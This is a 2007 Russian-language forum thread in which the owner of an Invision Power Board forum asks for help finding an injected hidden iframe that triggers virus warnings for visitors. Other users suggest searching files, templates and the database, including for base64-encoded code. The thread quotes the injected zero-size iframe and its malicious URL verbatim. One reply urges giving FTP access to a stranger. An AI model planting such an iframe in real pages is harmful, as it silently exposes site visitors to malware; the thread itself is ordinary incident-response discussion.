Троян Backdoor на форуме

[ElenaI]

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

 

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже

Версия форума 2.2.2, лицензионная

[Nonamers]

Админка->Изменить HTML шаблоны->skin_global->global_board_header

[ElenaI]

Админка->Изменить HTML шаблоны->skin_global->global_board_header

Я же написала, что встраивается эта строка ПОСЛЕ хедера, т. е. после во этой строки: <!-- / End board header -->

Но естественно, указанный Вами файл я несколько раз просмотрела еще до того как тут задать вопрос.

[Nonamers]

обычно меняют индексный файл (index.php)... как вариант можно конечно слить на локальный диск папку skin_cache(если конечно там это прописано) и сделать поиск с заданной строкой по файлам (например при помощи Total Commander) Изменено 31 Августа 2007 пользователем Nonamers

[..::NiK::..]

Такие вещи ищются элементарно:

1) Скачай в инете Text Replacer, прога бесплатна и элементарна в управлении.

2) Просканируй этой программой все файлы форума (можно даже бекап БД сканить) на предмет наличия выше упомянутой строки.

3) И будет тебе счастье

[Sannis]

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах

[ElenaI]

обычно меняют индексный файл (index.php)... как вариант можно конечно слить на локальный диск папку skin_cache(если конечно там это прописано) и сделать поиск с заданной строкой по файлам (например при помощи Total Commander)

В папке skin_cache последние изменения делались в феврале и апреле. Так что, там этого точно нет.

[Sannis]

Злоумышленник смог записать туда что-то, хзначит вполне возможно мог и дату сменить.

[ElenaI]

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах

А можно подробнее об этом? Дело в том, что файлы форума не менялись уже несклько месяцев, а троян появился только 2 недели назад.

Вот интересно, поможет ли апгрейт форума до версии 2.3.1., или лучше сначала решить проблему на этой версии?

[Sannis]

Если был получен доступ к FTP, то можно записать туда скрипт, кторый подправит в нужную сорону дату редактирования, если хостинг позволяет.

 

Может помочь, может не помочь.

 

В любом случае стоит скачать себе все файлы и поискать document.write и icqspl.jino-net.ru там.

[Borland_delphi_6]

В первую очередь на index.php посмотреть. Когда-то у меня была похожая фигня, вирус не тронул ничего, кроме index.php

[ElenaI]

В первую очередь на index.php посмотреть. Когда-то у меня была похожая фигня, вирус не тронул ничего, кроме index.php

На index.php все чисто, эт я в первую очередь проверила.

 

Такие вещи ищются элементарно:

1) Скачай в инете Text Replacer, прога бесплатна и элементарна в управлении.

2) Просканируй этой программой все файлы форума (можно даже бекап БД сканить) на предмет наличия выше упомянутой строки.

А можно для дилетантов ссылку на бесплатный Text Replacer, который сканит и php файлы в том числе. Я нашла только платный Text Replacer

[Borland_delphi_6]

Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

[ElenaI]

Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

Взяла, но не поняла, чем это может помочь в акетном поиске фрагмента текста? Для того, чтобы посмотреть каждый отдельный php, достаточно блокнота. Или есть какая-то опция?

[Spy]

Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

Взяла, но не поняла, чем это может помочь в акетном поиске фрагмента текста? Для того, чтобы посмотреть каждый отдельный php, достаточно блокнота. Или есть какая-то опция?

В Total Commander по нажатию Alt-F7 есть возможность поиска текста по файлам с любыми расширениями. Просканируйте директорию форума со всеми файлами на содержание этой строки..

[Brun_]

У меня таоке было. Неправда что менять нужно только в индексном файле. Менять нужно во всех файлах.

Строчку дописывают во все файлы в конце файла (даже в текстовых файлах и в тех было =( ).

[..::NiK::..]

А можно для дилетантов ссылку на бесплатный Text Replacer, который сканит и php файлы в том числе. Я нашла только платный Text Replacer

Специально для дилетантов:

качаем демку проги на оф. сайте

http://www.infortech.ru/prj/open/tr/

Демка от покупной версии отличается лишь тем, что она не сканирует вордовские файлы (у меня не разу в жизни сканировать эти файлы необходимости не возникало ), все остальные (html, htm, php, txt …) она прекрасно сканирует, не каких таймеров (типа 30 дней юзаешь, а потом прога блокируется) в демке нет, вобщем отличная вещь, всё на русском и управление элементарное.

 

Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

Для дилетантов эта прога сложнавата.

[ElenaI]

Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

 

У меня таоке было. Неправда что менять нужно только в индексном файле. Менять нужно во всех файлах.

Строчку дописывают во все файлы в конце файла (даже в текстовых файлах и в тех было =( ).

а что именно у вас было? у моих знакомых дважды сайт компании, на движке Joomla, заразили вирусом, так я им сразу нашла, где "собака порылась" - там действительно все индексные файлы были с припиской вконце, и дата изменения файлов была четкая - как раз день взлома. А тут я прост голову сломала, где искать. Противно до жути и оправдываться перед юзерами уже неловко.

[Sannis]

Вопрос:

Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

Ответ:

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах

 

Вопрос:

у моих знакомых дважды сайт компании, на движке Joomla, заразили вирусом, так я им сразу нашла, где "собака порылась" - там действительно все индексные файлы были с припиской вконце, и дата изменения файлов была четкая - как раз день взлома. А тут я прост голову сломала, где искать. Противно до жути и оправдываться перед юзерами уже неловко.

Ответ:

Сделайте бекап таблицы скинов(ibf_skin_templates) и поищите в нём ещё.

[ElenaI]

Вопрос:

Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

Ответ:

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах

На document.write я тоже все файлы просканировала, естественно (читать советы я умею ). Но нашлось сие только в 4 файлах, после чего я просканировала новый дистрибутив IPB 2.3.1 - там то же самое, в тех же файлах этот же document.write. Значит, не оно?

Базу данных сейчас гляну, спасибо.

 

Ответ:

Сделайте бекап таблицы скинов(ibf_skin_templates) и поищите в нём ещё.

Там тоже чисто, только что проверила.

Буду рада за любые идеи, ГДЕ искать эту троянску дрянь

[Nonamers]

возможно, что сама эта строка закодирована в base_64 например или другим способом

[ElenaI]

возможно, что сама эта строка закодирована в base_64 например или другим способом

и как же её искать?

вообще, теоретически, где "собирается" вся страница - в каком файле? После шапки форума (после закрытия всех тегов шапки) сразу встраивается эта строка с вирусом, но где-то же - в каком-то файле - идет сборка всех включений?

[Nonamers]

не парьтесь, а жалко уже Вас ... дайте доступ к фтп какому-нибудь опытному человеку Изменено 3 Сентября 2007 пользователем Nonamers

[ElenaI]

не парьтесь, а жалко уже Вас ... дайте доступ к фтп какому-нибудь опытному человеку

Вообще, раньше мне во всех этих вопросах помогал очень опытный человек, причем, не бесплатно, но он уже 2 месяца не выходит а связь, поэтому приходится разбираться самой Проблема в том, что если ты - владелец сайта, то в итоге лучше самому начать во всем разбираться, чем зависеть от других людей, у которых сегодня есть настроение что-то сделать, а на завтра - нет. Даже за деньги - все то же самое... Пэтому и прошу Может, кто хоть не даром, но поможет? Вот адрес форума.

[Sannis]

Nonamers бесплатно предлагает. И я присоединяюсь.

 

P.S. Возьмите с хостинга ./sources/classes/class_display.php, заархивируйте и выложите, он за вывод отвечает.

[Nonamers]

можете ничего не выкладывать, а просто постучаться ко мне в аську (она в профиле)